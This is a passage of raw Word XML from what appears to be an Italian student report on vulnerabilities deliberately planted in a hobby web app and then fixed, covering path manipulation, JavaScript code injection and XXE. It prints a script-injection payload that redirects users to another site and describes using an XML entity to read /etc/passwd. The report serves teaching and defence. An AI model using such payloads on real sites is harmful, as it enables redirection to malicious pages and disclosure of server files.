          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AD13B89" w14:textId="460BC4A0" w:rsidR="00071E32" w:rsidRDefault="00447273" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload da inserire al posto del nome della foto: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7317F3" w14:textId="76C4EA64" w:rsidR="00447273" w:rsidRDefault="008568AE" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251684864" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5D272CAD" wp14:editId="03458DB2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>189230</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7196455" cy="3596640"/>
            <wp:effectExtent l="0" t="0" r="4445" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="181807116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279"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7196455" cy="359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5D9A7C" w14:textId="70371A36" w:rsidR="00447273" w:rsidRPr="00447273" w:rsidRDefault="00447273" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F2BB6CB" w14:textId="4CD3F878" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F8F9A3E" w14:textId="7B99EF38" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B7FFB84" w14:textId="71B816AD" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E2E576B" w14:textId="60F40FDD" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D401E46" w14:textId="3A307AA4" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BBC71FF" w14:textId="3EA0EA8F" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AB4D1B8" w14:textId="6C4A2EBE" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E7C7C3C" w14:textId="1A2D5054" w:rsidR="00071E32" w:rsidRDefault="00071E32" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26B7E915" w14:textId="77777777" w:rsidR="002F292A" w:rsidRDefault="002F292A" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E0BAF92" w14:textId="77777777" w:rsidR="008568AE" w:rsidRDefault="008568AE" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08798EE3" w14:textId="77777777" w:rsidR="008568AE" w:rsidRDefault="008568AE" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="090BDC7C" w14:textId="77777777" w:rsidR="008568AE" w:rsidRDefault="008568AE" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BB064BE" w14:textId="51E0C6DC" w:rsidR="005A6F04" w:rsidRPr="008568AE" w:rsidRDefault="007F2270" w:rsidP="003620AB">
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Fix: </w:t>
      </w:r>
      <w:r>
        <w:t>per il fix è stato modificato l’UserController nel backend introducendo dei controlli sul nome del path dove cercare l’immagine, sia nella POST che nella GET.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2984F973" w14:textId="45B4B20A" w:rsidR="005A6F04" w:rsidRDefault="00370316" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251710464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B3363D1" wp14:editId="401EFBFB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>10795</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5498465" cy="2554383"/>
            <wp:effectExtent l="0" t="0" r="6985"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b="40756"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5498465" cy="2554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FD08A4" w14:textId="02926837" w:rsidR="005A6F04" w:rsidRDefault="005A6F04" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C6782B7" w14:textId="28CDE26C" w:rsidR="005A6F04" w:rsidRDefault="005A6F04" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38D0C1CC" w14:textId="2C4AAA13" w:rsidR="005A6F04" w:rsidRDefault="005A6F04" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26B07345" w14:textId="0651E03E" w:rsidR="005A6F04" w:rsidRDefault="005A6F04" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76AA3F4E" w14:textId="4524A65E" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="763A96FC" w14:textId="77777777" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="050DABB5" w14:textId="231220EA" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E906230" w14:textId="29C17955" w:rsidR="002F292A" w:rsidRDefault="002F292A" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C57FCE9" w14:textId="224A4016" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251711488" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2ACED2BA" wp14:editId="15893E46">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-434975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4324350" cy="3772368"/>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b="40281"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4324350" cy="37723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39EC28" w14:textId="2BC0E627" w:rsidR="002F292A" w:rsidRDefault="002F292A" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10162512" w14:textId="77777777" w:rsidR="002F292A" w:rsidRPr="003620AB" w:rsidRDefault="002F292A" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BEBFCD5" w14:textId="77777777" w:rsidR="00EB78A7" w:rsidRDefault="00EB78A7" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67FD7C4C" w14:textId="77777777" w:rsidR="002F292A" w:rsidRDefault="002F292A" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DA30EE2" w14:textId="77777777" w:rsidR="002F292A" w:rsidRDefault="002F292A" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61258D20" w14:textId="77777777" w:rsidR="005A6F04" w:rsidRDefault="005A6F04" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4255247F" w14:textId="77777777" w:rsidR="005A6F04" w:rsidRDefault="005A6F04" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77F6B71B" w14:textId="77777777" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EAE7E80" w14:textId="77777777" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="541BC3F5" w14:textId="77777777" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CE1802F" w14:textId="77777777" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DA5C8F9" w14:textId="77777777" w:rsidR="005A6F04" w:rsidRDefault="005A6F04" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3645418A" w14:textId="77777777" w:rsidR="00EB78A7" w:rsidRPr="00EB78A7" w:rsidRDefault="00EB78A7" w:rsidP="00EB78A7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A3046DE" w14:textId="3D6A5348" w:rsidR="005D6BD8" w:rsidRPr="00FC6F6C" w:rsidRDefault="005D6BD8" w:rsidP="00FC6F6C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC6F6C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Malicious code Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B20BAF2" w14:textId="759A0165" w:rsidR="007D3F5D" w:rsidRDefault="007D3F5D" w:rsidP="00467BBC">
      <w:r>
        <w:t>Si tratta di una vulnerabilità che ha lo scopo di inserire codice malevolo con lo scopo di eseguirlo lato utente. Ciò è possibile a causa di una mancanza di validazione di istruzioni che ricevono input dall’utente, consentendo l’interpretazione e l’esecuzione di tale codice da pare dell’applicazione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117BAB6C" w14:textId="4920844F" w:rsidR="005D6BD8" w:rsidRDefault="007D3F5D" w:rsidP="00467BBC">
      <w:r>
        <w:t>Nel nostro codice è</w:t>
      </w:r>
      <w:r w:rsidR="00EB78A7">
        <w:t xml:space="preserve"> stato modificato </w:t>
      </w:r>
      <w:r w:rsidR="005D6BD8">
        <w:t>HobbiePages.jsx e</w:t>
      </w:r>
      <w:r w:rsidR="00EB78A7">
        <w:t xml:space="preserve"> viene richiamato quando l’utente clicca l’hobby. </w:t>
      </w:r>
      <w:r>
        <w:t>L’idea iniziale è quella di inserire un alert che mostri le informazioni di co</w:t>
      </w:r>
      <w:r w:rsidR="00C64892">
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>tatto del business creatore dell’hobby. Tuttavia, dato un certo input è possibile inserire un’istruzione che fa il redirect ad un sito malevolo. In questo caso è stato usato il sito di Google come esempio</w:t>
      </w:r>
      <w:r w:rsidR="00EB78A7">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Un attacante dovrebbe autenticarsi come utente business, inserire l’url al sito malevolo nelle sue informazioni di contatto con l’obiettivo di farlo aprire ad un utente normale.</w:t>
      </w:r>
      <w:r w:rsidR="00EB78A7">
        <w:t xml:space="preserve"> Questo è il payload </w:t>
      </w:r>
      <w:r>
        <w:t>da inserire:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0434CFB6" w14:textId="1CFE903C" w:rsidR="00EB78A7" w:rsidRDefault="00EB78A7" w:rsidP="00467BBC">
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB78A7">
        <w:t>);window.location.href = 'https://www.google.com'//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402712CC" w14:textId="6D83EBDF" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0ECDB41A" w14:textId="17EA2ED8" w:rsidR="00D12C9A" w:rsidRDefault="00370316" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251678720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="16E8E6A7" wp14:editId="20CBF527">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>8890</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3890010" cy="671830"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="15060419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32877"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3890010" cy="671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CCD0D" w14:textId="68BC392C" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="36EF52B8" w14:textId="3EF709E0" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="751C6E1A" w14:textId="6CCA9C05" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="58F16B52" w14:textId="2F98151E" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1906DDFE" w14:textId="019EA9FC" w:rsidR="004B30FC" w:rsidRDefault="00370316" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="541490E9" wp14:editId="3A374F06">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-626745</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3368040" cy="4226443"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3175"/>
            <wp:wrapNone/>
            <wp:docPr id="21129667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8040" cy="4226443"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C4E922" w14:textId="4D02DB2A" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6658EDA7" w14:textId="695D9E66" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7AEB9243" w14:textId="77777777" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00467BBC"/>
    <w:p w14:paraId="70773928" w14:textId="77777777" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1D543AF5" w14:textId="50C062A6" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="524E77FA" w14:textId="77777777" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4D89A41F" w14:textId="073C70A1" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2D1F2C5F" w14:textId="77777777" w:rsidR="007D3F5D" w:rsidRDefault="007D3F5D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3CEEA698" w14:textId="77777777" w:rsidR="007D3F5D" w:rsidRDefault="007D3F5D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="21B5710E" w14:textId="77777777" w:rsidR="007D3F5D" w:rsidRDefault="007D3F5D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="538BE16E" w14:textId="44AC4DBC" w:rsidR="00A54E4E" w:rsidRDefault="00A54E4E" w:rsidP="00467BBC"/>
    <w:p w14:paraId="67095FFB" w14:textId="4240281D" w:rsidR="004B30FC" w:rsidRDefault="00A54E4E" w:rsidP="00467BBC">
      <w:r>
        <w:t>Fix: è stato usato DOMPurify per sanitizzare l’input ed è stato eliminato l’eval che è fonte di attacchi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EBB59E" w14:textId="090474AE" w:rsidR="0031586D" w:rsidRDefault="00A54E4E" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251712512" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="47321C35" wp14:editId="56064616">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7620</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4229100" cy="143256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b="44908"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4229100"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20C281" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="60C9F11F" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="500A8E16" w14:textId="77777777" w:rsidR="00A54E4E" w:rsidRDefault="00A54E4E" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3C16D294" w14:textId="77777777" w:rsidR="00FC6F6C" w:rsidRDefault="00FC6F6C" w:rsidP="00FC6F6C"/>
    <w:p w14:paraId="649C3F64" w14:textId="647A6AB7" w:rsidR="0031586D" w:rsidRPr="00FC6F6C" w:rsidRDefault="009B3431" w:rsidP="00FC6F6C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC6F6C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="00B11AA2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ML External </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6F6C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00B11AA2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ntity (XXE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6F6C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E5A1E5" w14:textId="77777777" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="009B3431">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E48EB75" w14:textId="5160AD4F" w:rsidR="00450AE3" w:rsidRDefault="00450AE3" w:rsidP="009B3431">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nel caso in cui un’applicazione fa utilizzo di dati XML, questa vulnerabilità consente a un attaccante di interferire con il normale processamento di tali dati, sfruttando alcuni costrutti tipici del linguaggio XML come DTD e external entities, consentendo spesso l’accesso al filesystem del server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BF85CC" w14:textId="2FF08A9F" w:rsidR="0031586D" w:rsidRDefault="009B3431" w:rsidP="00281830">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC6F6C">
        <w:t>Nel componente HobbiePages è stat</w:t>
      </w:r>
      <w:r w:rsidR="00450AE3">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6F6C">
        <w:t xml:space="preserve"> introdotta la possibilità di inserire un commento nell’hobby di un utente o dal business. </w:t>
      </w:r>
      <w:r w:rsidR="00FC6F6C" w:rsidRPr="00FC6F6C">
        <w:t xml:space="preserve">Il commento viene scritto in </w:t>
      </w:r>
      <w:r w:rsidR="00450AE3">
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidR="00450AE3" w:rsidRPr="00FC6F6C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC6F6C" w:rsidRPr="00FC6F6C">
        <w:t xml:space="preserve">e non contiene nessuna </w:t>
      </w:r>
      <w:r w:rsidR="00AC599E" w:rsidRPr="00FC6F6C">
        <w:t>sanitizzazione; dunque,</w:t>
      </w:r>
      <w:r w:rsidR="00FC6F6C" w:rsidRPr="00FC6F6C">
        <w:t xml:space="preserve"> l’utente può inserire nel commento </w:t>
      </w:r>
      <w:r w:rsidR="00450AE3">
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidR="00450AE3" w:rsidRPr="00FC6F6C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC6F6C" w:rsidRPr="00FC6F6C">
        <w:t xml:space="preserve">tramite il browser una entity per accedere a file segreti del pc come etc/passwd. </w:t>
      </w:r>
      <w:r w:rsidR="00FC6F6C">
        <w:t>Nella risposta viene ritornato il contenuto del file etc/passwd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B3EDA7" w14:textId="3533419B" w:rsidR="00EB78A7" w:rsidRDefault="00FC6F6C" w:rsidP="00467BBC">
      <w:r>
        <w:t>HobbiePages:</w:t>
      </w:r>
    </w:p>
